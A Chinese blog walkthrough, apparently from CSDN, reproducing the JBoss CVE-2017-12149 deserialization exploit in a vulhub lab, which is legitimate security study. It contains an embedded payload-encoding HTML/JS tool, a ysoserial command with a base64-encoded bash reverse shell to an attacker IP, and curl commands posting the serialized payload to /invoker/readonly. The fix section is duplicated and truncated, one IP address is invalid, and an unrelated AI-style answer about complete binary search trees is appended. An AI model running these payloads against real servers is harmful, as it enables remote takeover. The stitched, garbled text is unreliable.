JBoss5.x6.x反序列化漏洞(CVE-2017-12149)复现学习

原创 已于 2022-03-29 17:19:26 修改 · 2.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #安全 #web安全

于 2022-03-29 17:17:20 首次发布

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)复现学习

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

漏洞概要

漏洞名称JBOSSAS5.x/6.x反序列化命令执行漏洞
威胁类型远程命令执行
威胁等级
漏洞IDCVE-2017-12149
受影响系统及应用版本Jboss AS 5.xJbossAS 6.x

漏洞环境

https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

初始化

docker-compose up -d

初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。

漏洞复现

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:
在这里插入图片描述

编写反弹shell的命令

<!DOCTYPE html>
<html lang="en">
 <head> 
  <title>java.lang.Runtime.exec() Payload Workarounds - @Jackson_T</title> 
  <meta charset="utf-8" /> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0" /> 
  <!-- <link rel="stylesheet" href="./css/main.css" type="text/css" /> --> 
  <style>
body {
	margin: 0;
	padding: 10px 0;
	text-align: center;
	font-family: 'Ubuntu Condensed', sans-serif;
	color: #585858;
  background-color: #fff;
	font-size: 13px;
	line-height: 1.4
}			
::selection {
	background: #fff2a8;
}
pre, code {
	font-family: 'Ubuntu Mono', 'Consolas', Monospace;
  font-size: 13px;
  background-color: #E5F5E5;
  color: #585858;
  padding-left: 0.25em;
  padding-right: 0.25em;
	/*display: block;*/
}		
#wrap {
	margin-left: 1em;
	margin-right: 1em;
	text-align: left;
	font-size: 13px;
	line-height: 1.4
}
	#wrap {
		width: 820px;
	}
	#container {
		float: right;
		width: 610px;
	}
.entry {
	font-size: 14px;
	line-height: 20px;
	hyphens: auto;
	font-family: 'Roboto', sans-serif, 'Inconsolata', Monospace;
}
</style> 
 </head> 
 <body> 
  <div id="wrap"> 
   <div id="container"> 
    <div class="entry"> 
     <article> 
      <p>偶尔有时命令执行有效负载<code>Runtime.getRuntime().exec()</code>失败. 使用 web shells, 反序列化漏洞或其他向量时可能会发生这种情况.</p> 
      <p>有时这是因为重定向和管道字符的使用方式在正在启动的进程的上下文中没有意义. 例如 <code>ls &gt; dir_listing</code> 在shell中执行应该将当前目录的列表输出到名为的文件中 <code>dir_listing</code>. 但是在 <code>exec()</code> 函数的上下文中,该命令将被解释为获取 <code>&gt;</code><code>dir_listing</code> 目录.</p> 
      <p>其他时候,其中包含空格的参数会被StringTokenizer类破坏.该类将空格分割为命令字符串. 那样的东西 <code>ls &quot;My Directory&quot;</code> 会被解释为 <code>ls '&quot;My' 'Directory&quot;'</code>.</p> 
      <p>在Base64编码的帮助下, 下面的转换器可以帮助减少这些问题. 它可以通过调用Bash或PowerShell再次使管道和重定向更好,并且还确保参数中没有空格.</p> 
      <p>Input type: <input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked="" /><label for="bash">Bash</label> <input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();" /><label for="powershell">PowerShell</label> <input type="radio" id="python" name="option" value="python" onclick="processInput();" /><label for="python">Python</label> <input type="radio" id="perl" name="option" value="perl" onclick="processInput();" /><label for="perl">Perl</label></p> 
      <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type input here..."></textarea> <textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p> 
      <script>
  var taInput = document.querySelector('textarea#input');
  var taOutput = document.querySelector('textarea#output');

  function processInput() {
    var option = document.querySelector('input[name="option"]:checked').value;

    switch (option) {
      case 'bash':
        taInput.placeholder = 'Type Bash here...'
        taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
        break;
      case 'powershell':
        taInput.placeholder = 'Type PowerShell here...'
        poshInput = ''
        for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
        taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
        break;
      case 'python':
        taInput.placeholder = 'Type Python here...'
        taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
        break;
      case 'perl':
        taInput.placeholder = 'Type Perl here...'
        taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
        break;
      default:
        taOutput.value = ''
    }

    if (!taInput.value) taOutput.value = '';
  }

  taInput.addEventListener('input', processInput, false);
</script> 
     </article> 
    </div> 
   </div> 
  </div>  
 </body>
</html>

通过上面的html进行bash
在这里插入图片描述

序列化数据生成

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1My4xMjgvMjEgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser

生成好的POC即为poc.ser

发送POC

使用burp或者通过二进制的方式post发送攻击载荷

  • 通过二进制POST方式发送攻击载荷到 /invoker/readonly
curl http://172.18.174.198:8080/invoker/readonly --data-binary @poc.ser

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AhLgexcN-1648545274396)(E:\学习\picture\image-20220329165948680.png)]
在这里插入图片描述

  • 通过burp

    将这个文件作为POST Body发送至/invoker/readonly即可:
    在这里插入图片描述

JBoss反序列化工具一键检测:

在这里插入图片描述

攻击方式

攻击者只需要构造带有需要执行Payload的ser文件,然后使用curl将二进制文件提交至目标服务器的invoker/readonly页面中,即可执行Payload中指定的命令,获取对电脑的控制权。攻击示例代码如下:

//编译预置payload的java文件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

//反弹shell的IP和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 1.1.1.1:6666

//使用curl向/invoker/readonly提交payload

curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

修复方法

  1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。

  2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对 http invoker 组件进行访问控制:

–data-binary @ReverseShellCommonsCollectionsHashMap.ser

修复方法

  1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。

  2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对 http invoker 组件进行访问控制:

  <url-pattern>/*</url-pattern>
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
关于JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)的复现
mw_myever的博客
10-06 843
一、漏洞介绍 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。 二、环境搭建 攻击机:192.168.70.2(kali) 受害机:192.168.70.3(vulhub) 利用命令:docker-compose up -d 启动环境 三、访问目标 1、探测 在kali上利用命令:
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
weixin_30606461的博客
11-27 229
  本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习   文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)   靶机地址:192.168.1.102 服务端口:8080       测试机:192.168.1.100   搭建好环境,访问地址:http://192.168...
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 572
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 6325
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
jboss 5.x/6.x 反序列化漏洞 cve-2017-12149
whatday的专栏
07-31 704
目录 测试环境 漏洞复现 编写反弹shell的命令 序列化数据生成 发送POC 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 参考: https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg https://access.redhat.com/securit
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
YouthBelief的博客
11-01 764
JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 0x01 漏洞描述 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Ht
JBoss反序列化漏洞复现 CVE-2017-12149
m0_62284238的博客
09-11 718
该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。由于Runtime.getRuntime().exec()不能使用管道符等bash需要的方法,因此我们对这个bash命令进行base64编码,再让bash输出base64解码后的命令。该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化。生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可。
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 479
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
CVE-2017-12149漏洞复现
zkaqlaoniao的博客
10-31 679
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
JBoss-5.x6.x-反序列化CVE-2017-12149
bqnagus
10-02 1144
JBoss-5.x6.x-反序列化CVE-2017-12149
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 797
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 2141
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-12149JBOSS反序列化远程代码执行漏洞漏洞复现
Jerry____的博客
12-12 4832
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
Jboss CVE-2017-12149 漏洞复现(vulhub)
MDSEC的博客
08-24 507
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
JBoss 5.x/6.x 反序列化漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 469
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
Complete Binary Search Tree
最新发布
03-29
<think>嗯,用户想了解关于完整二叉搜索树的概念和实现方法。首先,我需要明确什么是完整二叉搜索树(Complete Binary Search Tree,CBST)。根据之前学过的知识,二叉树中的完全二叉树(Complete Binary Tree)是指除了最后一层外,其他层都是满的,并且最后一层的节点都尽可能靠左排列。而二叉搜索树(Binary Search Tree,BST)的特点是每个节点的左子树所有节点的值都小于该节点的值,右子树则都大于。所以完整二叉搜索树应该是结合了这两种特性的数据结构,即同时满足完全二叉树的结构和二叉搜索树的排序性质。 接下来,我需要确认完整二叉搜索树的具体定义和特点。完全二叉树的特性使得它可以用数组高效地存储,而不需要指针,这对于内存管理是有优势的。而二叉搜索树的特性则保证了高效的查找、插入和删除操作,平均时间复杂度为O(log n)。结合起来,CBST可能在保持高效操作的同时,优化存储结构。不过,用户可能想知道如何实现这样的数据结构,或者它的具体应用场景。 然后,实现方法方面,可能需要考虑如何构建这样的树。由于是完全二叉树,节点的位置可以通过数组的索引来确定,比如对于节点i,左子节点在2i+1,右子节点在2i+2。同时,作为二叉搜索树,必须满足左子树的值小于根节点,右子树的值大于根节点。因此,构建CBST可能需要将给定的有序数组按照完全二叉树的结构进行排列。例如,对于有序数组,中序遍历完全二叉树的结构应该能得到有序序列,因此可能需要找到中间节点作为根,递归构建左子树和右子树。 另外,用户可能关心插入和删除操作在CBST中的处理。因为完全二叉树的结构要求最后一层尽可能左对齐,插入和删除可能需要调整树的结构以维持完全性,这可能会影响二叉搜索树的性质。这时候可能需要特定的算法来保持两者的平衡,或者在某些情况下,CBST可能更适合静态数据,而不是频繁变动的数据,因为维护结构可能代价较高。 还需要考虑CBST与其他类型二叉搜索树的区别,比如平衡二叉搜索树(如AVL树、红黑树)。CBST可能在存储上更紧凑,但可能在动态操作上不如平衡树高效。因此,用户可能想知道在什么情况下选择CBST更合适,比如数据静态且需要快速查找的情况下。 此外,用户的问题中提到了“实现方法”,可能需要给出具体的代码示例,比如如何从有序数组构建CBST,或者如何插入节点。例如,可以通过递归方法,每次选择中间元素作为根节点,然后递归构建左右子树,确保完全二叉树的结构。这部分需要结合算法步骤和代码实现来说明。 最后,需要验证自己的理解是否正确,是否有遗漏或错误的地方。例如,是否混淆了完全二叉树和满二叉树的概念,或者是否正确处理了二叉搜索树的排序性质与完全二叉树结构之间的冲突。比如,在构建过程中,如何确保节点位置既满足完全性,又满足左小右大的顺序,可能需要特定的构建策略,如中序遍历填充。</think>### 完整二叉搜索树(Complete Binary Search Tree)概念解析 完整二叉搜索树是**完全二叉树**和**二叉搜索树**的结合体,需同时满足以下特性: 1. **完全二叉树结构**:所有层除最后一层外均为满层,最后一层节点左对齐排列[^1] 2. **二叉搜索树性质**:任意节点的左子树值均小于该节点,右子树值均大于该节点 $$ \text{设节点索引为}i,\ \text{左子节点索引}=2i+1,\ \text{右子节点索引}=2i+2 $$ ### 核心实现步骤(以数组存储为例) 1. **数据预处理**:将输入数据排序为升序序列 2. **递归构建**: ```python def build_cbst(sorted_arr, tree, root_index=0): if not sorted_arr: return n = len(sorted_arr) mid = n // 2 # 计算中间索引 tree[root_index] = sorted_arr[mid] # 递归构建左子树(左半部分) build_cbst(sorted_arr[:mid], tree, 2*root_index+1) # 递归构建右子树(右半部分) build_cbst(sorted_arr[mid+1:], tree, 2*root_index+2) ``` 3. **空间分配**:根据完全二叉树特性预分配数组空间 $$ \text{数组长度}=2^h-1\ \text{(h为树的高度)} $$ ### 关键特性对比 | 特性 | 普通BST | 完整BST | |---------------------|---------|--------------| | 空间利用率 | 动态 | 100%(数组) | | 查找时间复杂度 | O(h) | O(log n) | | 插入/删除复杂度 | O(h) | O(n) | | 适合场景 | 动态数据| 静态数据 | ### 应用场景 1. 预先生成的静态数据集快速查询(如字典数据) 2. 需要固定存储空间的嵌入式系统 3. 需要快速序列化/反序列化的场景[^3]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值